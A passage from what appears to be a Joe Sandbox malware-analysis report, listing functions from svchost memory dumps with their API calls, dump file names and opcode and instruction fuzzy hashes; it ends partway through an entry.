                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: freemalloc
                          • String ID: %u/%ld/%s
                          • API String ID: 3061335427-1579391714
                          • Opcode ID: 6e01879f14104608e8d482a9960c4a0608cb097af282014483f6cf99bded7ff6
                          • Instruction ID: de6c0f1ee6c90216429938cd4ddbd9a0153f7513fea3ba5688f470df06f13fd2
                          • Opcode Fuzzy Hash: 6e01879f14104608e8d482a9960c4a0608cb097af282014483f6cf99bded7ff6
                          • Instruction Fuzzy Hash: F261AF6AB0EB8A86EB628F11E4607AA3775FB46F84F444531DE4D0B786CF38E505C714
                          Function 00007FFDA55787E0 Relevance: 4.5, APIs: 3, Instructions: 37networkCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: ErrorLastSleepgetsockopt
                          • String ID:
                          • API String ID: 3033474312-0
                          • Opcode ID: cbea957c7a8fdcc0c36749ae218925b5f3caa1a0fc7cb6f7d3f347c8bc36a720
                          • Instruction ID: 28b4d6e1d4d903c7ae30f8dc6c7d3a49b22a6285eda8eead78f2c1942f320598
                          • Opcode Fuzzy Hash: cbea957c7a8fdcc0c36749ae218925b5f3caa1a0fc7cb6f7d3f347c8bc36a720
                          • Instruction Fuzzy Hash: D5018F37B0D68793E7698F11E46433AA7A0AB46B90F244834EE8D82B99DF3DD444CB04
                          Function 00007FFDA3788180 Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          • Associated: 00000035.00000002.3362935112.00007FFDA3770000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363010077.00007FFDA37BE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363028789.00007FFDA37BF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: E_finishE_freeX509_free
                          • String ID:
                          • API String ID: 769585774-0
                          • Opcode ID: b59662237c3bc5e40f8e3037610cea79ead3f114ad4d00d2abc8a578c68cf0d8
                          • Instruction ID: 6511e38d3030e8abe19eb916aafc696fa22e227fb1494b360e8df15e8ecf67a1
                          • Opcode Fuzzy Hash: b59662237c3bc5e40f8e3037610cea79ead3f114ad4d00d2abc8a578c68cf0d8
                          • Instruction Fuzzy Hash: 6711A962B8B6C386EB65DF20D1713B83611EF40F89F1C0039DB492A387CF3A91818328
                          Function 00007FFDA5586560 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                          Download Yara Rule
                          APIs
                          • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00007FFDA557A4D4), ref: 00007FFDA558656B
                          • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,00007FFDA557A4D4), ref: 00007FFDA5586591
                          • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,00007FFDA557A4D4), ref: 00007FFDA55865A5
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: ExclusiveLock$Release$Acquire
                          • String ID:
                          • API String ID: 1021914862-0
                          • Opcode ID: 487b4586fa51d13810dd78a9784ac8cd9bbedfc040dbe52416832f73b9c144de
                          • Instruction ID: bf1971222a595a6056592c638902e7d5701a09bb673b6a02a1be697c76d600e5
                          • Opcode Fuzzy Hash: 487b4586fa51d13810dd78a9784ac8cd9bbedfc040dbe52416832f73b9c144de
                          • Instruction Fuzzy Hash: 77F0121AF2B80BC1E705DF51EC753751291AF95B50FC04030D00E427A2DE2CE5598744
                          Function 00007FFDA558FE20 Relevance: 3.8, APIs: 3, Instructions: 87COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: malloc$memmove
                          • String ID:
                          • API String ID: 1808909948-0
                          • Opcode ID: b35b362c05aff2789765e56d10a2213f184adf2532e6cfc79855a153cf41f60a
                          • Instruction ID: a786c50f3ff5169b5c915e3786bafc1502d55f44478cf58551c9edefacb590f6
                          • Opcode Fuzzy Hash: b35b362c05aff2789765e56d10a2213f184adf2532e6cfc79855a153cf41f60a
                          • Instruction Fuzzy Hash: 12317C6A70AB55C2EA61CF56D46026963B0FF0AFC0B485435DF4D43B46EF38E465C304
                          Function 00007FFDA5575CD0 Relevance: 3.8, APIs: 3, Instructions: 79COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: callocfree
                          • String ID:
                          • API String ID: 306872129-0
                          • Opcode ID: b72aaa71d823b0aa299c20d7c41a48865cc6457bf972838e1c8063c93baaf237
                          • Instruction ID: 4410e58222e193b23be451d2820b83b3e56e7675e2d6b892a750211a6e9dc0d3
                          • Opcode Fuzzy Hash: b72aaa71d823b0aa299c20d7c41a48865cc6457bf972838e1c8063c93baaf237
                          • Instruction Fuzzy Hash: 4021F969B0E78641E6125F26A82437B6751BB86FD4F480431EE8D47753DF7CD2428304
                          Function 00007FFDA557B3D0 Relevance: 3.8, APIs: 3, Instructions: 69COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$calloc
                          • String ID:
                          • API String ID: 3095843317-0
                          • Opcode ID: 69fa5bebc68dcac98da7414f88ed7e2519d7086ffb7c23b33bd23f0b43c82365
                          • Instruction ID: d73a652e4d7743636bf870ac6b356d01cb54b979000b2ab4beece4805d82c852
                          • Opcode Fuzzy Hash: 69fa5bebc68dcac98da7414f88ed7e2519d7086ffb7c23b33bd23f0b43c82365
                          • Instruction Fuzzy Hash: C021E136B0AB4A81E7129F12A8503A967A2FB85FE0F084435EE4C47B52EF7CD4418304
                          Function 00007FFDA37767A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 87COMMON
                          Download Yara Rule
                          APIs
                          • _time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDA3776861
                            • Part of subcall function 00007FFDA377A920: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA377A942
                            • Part of subcall function 00007FFDA377A920: strtol.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FFDA377A956
                            • Part of subcall function 00007FFDA377A920: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA377A965
                            • Part of subcall function 00007FFDA377A920: isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA377A983
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          • Associated: 00000035.00000002.3362935112.00007FFDA3770000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363010077.00007FFDA37BE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363028789.00007FFDA37BF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: _errno$_time64isspacestrtol
                          • String ID: connect_timeout
                          • API String ID: 1465606051-1301815820
                          • Opcode ID: f9e2b2dd4110b161da813af918f7151e10ea1b4db753d8a941a0c659d0753ac6
                          • Instruction ID: 8bff285f11271bd3f950ba244e2ec189bfab80e4af65f46cf53422758d20773c
                          • Opcode Fuzzy Hash: f9e2b2dd4110b161da813af918f7151e10ea1b4db753d8a941a0c659d0753ac6
                          • Instruction Fuzzy Hash: 55310732F0A1418AF7E48E2590205B976A2EF45B64F180235DE6D273CBCFBAE8419744
                          Function 00007FFDA333A280 Relevance: 3.2, APIs: 2, Instructions: 155COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: O_free
                          • String ID:
                          • API String ID: 2581946324-0
                          • Opcode ID: e553ec5b8b0fed837ad59d7719962a035d2a56f82eaa6423f3b5d4b51490fcf7
                          • Instruction ID: 6dbab1257e2afc9ca43deba98e1e095b2b3291a48d7618120e9882c6e2208e41
                          • Opcode Fuzzy Hash: e553ec5b8b0fed837ad59d7719962a035d2a56f82eaa6423f3b5d4b51490fcf7
                          • Instruction Fuzzy Hash: EE711133609B8086D750DF25E89025EB7E9F784B88F244939EE8D57B19CF39C4A1CB58
                          Function 00007FFDA337FF20 Relevance: 3.1, APIs: 2, Instructions: 124COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: O_free
                          • String ID:
                          • API String ID: 2581946324-0
                          • Opcode ID: c3d226b7a5d4f18efd56db8e6d4485786acd9de6cc0e4b5505d7d8d09eaf298c
                          • Instruction ID: 08d13b0d6caa96038ee17495821ad076c05bce36dc3db1cbc74315f716ce485b
                          • Opcode Fuzzy Hash: c3d226b7a5d4f18efd56db8e6d4485786acd9de6cc0e4b5505d7d8d09eaf298c
                          • Instruction Fuzzy Hash: DC511033608B8086D750DF25E89025AB7E9F784F88F244929EECD57B19CF39C4A1DB58
                          Function 00007FFDA33A2D10 Relevance: 3.1, APIs: 2, Instructions: 121COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: M_growmemcpy
                          • String ID:
                          • API String ID: 2478243595-0
                          • Opcode ID: 59ccbb3bb9be0ec2aee071d67a8046625b0f8bf0954fe4b6591bb4951fe69e8f
                          • Instruction ID: 93dbd864b37342a7431e1699cfaddb7ca857db0293fe699dae5986ad8be7be61
                          • Opcode Fuzzy Hash: 59ccbb3bb9be0ec2aee071d67a8046625b0f8bf0954fe4b6591bb4951fe69e8f
                          • Instruction Fuzzy Hash: 8C518132B09FC681DB54EF16E4503A87361FB48B98F088532EE8D977A9DF7AD4818314
                          Function 00007FFD942E5660 Relevance: 3.1, APIs: 2, Instructions: 76COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FFD942D944E,?,?,?,00007FFD942D970A), ref: 00007FFD942E5686
                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FFD942E56E9
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          • Associated: 00000035.00000002.3362523626.00007FFD94240000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362605186.00007FFD94303000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362698877.00007FFD9445A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362719340.00007FFD9445D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362740573.00007FFD9445E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362762637.00007FFD94462000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: FeaturePresentProcessor_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 1808705829-0
                          • Opcode ID: 1b2f749e313dfc5569fe0a61edaeb746f72f4ec4fd78a807df2ebfd42354c913
                          • Instruction ID: d57def42302f5e85433eb1ae723f5a12fe9445a7e5ff8ce356864dc1bf9f9a1a
                          • Opcode Fuzzy Hash: 1b2f749e313dfc5569fe0a61edaeb746f72f4ec4fd78a807df2ebfd42354c913
                          • Instruction Fuzzy Hash: 72317021B2D642C2FA78AFD194A12BB6290BF87784F54C434EA4D17AD7DE3EE840C711
                          Function 00007FFDA337FD70 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: O_free
                          • String ID:
                          • API String ID: 2581946324-0
                          • Opcode ID: 0ec6a5da9dd24791ccbb90d3d7413c2695686832c15197f3a623ed94e41998b7
                          • Instruction ID: 6481212873616efe27520b439c68a31c81724c8e17325ef95203dd8f33b4e316
                          • Opcode Fuzzy Hash: 0ec6a5da9dd24791ccbb90d3d7413c2695686832c15197f3a623ed94e41998b7
                          • Instruction Fuzzy Hash: 0431FD33619BA085EB40EF35E45026C73AAFB84F88F145136EA4D97B5ACF35D892C354
                          Function 00007FFD942ED4EC Relevance: 3.1, APIs: 2, Instructions: 59COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          • Associated: 00000035.00000002.3362523626.00007FFD94240000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362605186.00007FFD94303000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362698877.00007FFD9445A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362719340.00007FFD9445D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362740573.00007FFD9445E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362762637.00007FFD94462000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: ChangeCloseErrorFindLastNotification
                          • String ID:
                          • API String ID: 1687624791-0
                          • Opcode ID: 5415232223c49cab955febe67e80327f788ad51cb6d2aa244ca356c60ab58e46
                          • Instruction ID: e252064ed6d766ba8c360120988dd9578cf7823976567fc3142a75e3d53bf553
                          • Opcode Fuzzy Hash: 5415232223c49cab955febe67e80327f788ad51cb6d2aa244ca356c60ab58e46
                          • Instruction Fuzzy Hash: D8218011B2874341EA7097E594E027E1291BF867E4F548335EA2E473C7DE6DE445C300
                          Function 00007FFD942EEB54 Relevance: 3.0, APIs: 2, Instructions: 47COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          • Associated: 00000035.00000002.3362523626.00007FFD94240000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362605186.00007FFD94303000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362698877.00007FFD9445A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362719340.00007FFD9445D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362740573.00007FFD9445E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362762637.00007FFD94462000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: ErrorFileLastPointer
                          • String ID:
                          • API String ID: 2976181284-0
                          • Opcode ID: c170c5a0fb32560508b9c18f16d7facb2d7ad41fdb307ab6ee759ac187c5f4d6
                          • Instruction ID: 0bfa4573910271d046c826ffe8ea197d8c6cfe25f9de6f2ab41379b13cc31747
                          • Opcode Fuzzy Hash: c170c5a0fb32560508b9c18f16d7facb2d7ad41fdb307ab6ee759ac187c5f4d6
                          • Instruction Fuzzy Hash: 0C11E261B18B8181DA209B65A49436AA361FB46BF4F548335EA7E4B7EACF7CD010C740
                          Function 00007FFDA5591460 Relevance: 3.0, APIs: 2, Instructions: 41networkCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: closesocketsocket
                          • String ID:
                          • API String ID: 2760038618-0
                          • Opcode ID: 86b13b9b5e5e47f8443fce572f867978864a31f214c007410feaabd07d40291d
                          • Instruction ID: 4700140a2e6e51d8ca52fc4e5545e3f350c6ba3095d7225249871aeb5d7f0fb8
                          • Opcode Fuzzy Hash: 86b13b9b5e5e47f8443fce572f867978864a31f214c007410feaabd07d40291d
                          • Instruction Fuzzy Hash: C801D157F0628987FF858BB690D13B81650AB16F74F4C4274CE2D063C2CE5C88D48314
                          Function 00007FFD942CA538 Relevance: 3.0, APIs: 2, Instructions: 38COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          • Associated: 00000035.00000002.3362523626.00007FFD94240000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362605186.00007FFD94303000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362698877.00007FFD9445A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362719340.00007FFD9445D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362740573.00007FFD9445E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362762637.00007FFD94462000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: Concurrency::cancel_current_task
                          • String ID:
                          • API String ID: 118556049-0
                          • Opcode ID: 739a9774b4a865556e64bdd6c4dac42dbca6b25d989a43e6407820ad6072e605
                          • Instruction ID: 23f07b702b827e1a631b77974546e06784a5a6e2625f3702d256c47eda17c9b1
                          • Opcode Fuzzy Hash: 739a9774b4a865556e64bdd6c4dac42dbca6b25d989a43e6407820ad6072e605
                          • Instruction Fuzzy Hash: A0F0F610F1A10381F978B7E25AB12B902A03F4A7E2F18CBB0D92E452D3ED1EE855C610
                          Function 00007FFDA5586C50 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: ExclusiveLock$AcquireRelease
                          • String ID:
                          • API String ID: 17069307-0
                          • Opcode ID: 4e63b957b1adf01b2c6230385774097f2dfe615c326b4d59037c5b0e72cf460b
                          • Instruction ID: 0f10741087a892ad014a16c6939e9803bbd8abe302da7c879e901df80a4e6306
                          • Opcode Fuzzy Hash: 4e63b957b1adf01b2c6230385774097f2dfe615c326b4d59037c5b0e72cf460b
                          • Instruction Fuzzy Hash: 52D05B1EF2760BC2E7069FA0E8E52741211AF5DB10F401034C84F42753DE2CA44C8344
                          Function 00007FFD942E72E0 Relevance: 2.5, APIs: 2, Instructions: 43COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          • Associated: 00000035.00000002.3362523626.00007FFD94240000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362605186.00007FFD94303000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362698877.00007FFD9445A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362719340.00007FFD9445D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362740573.00007FFD9445E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362762637.00007FFD94462000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
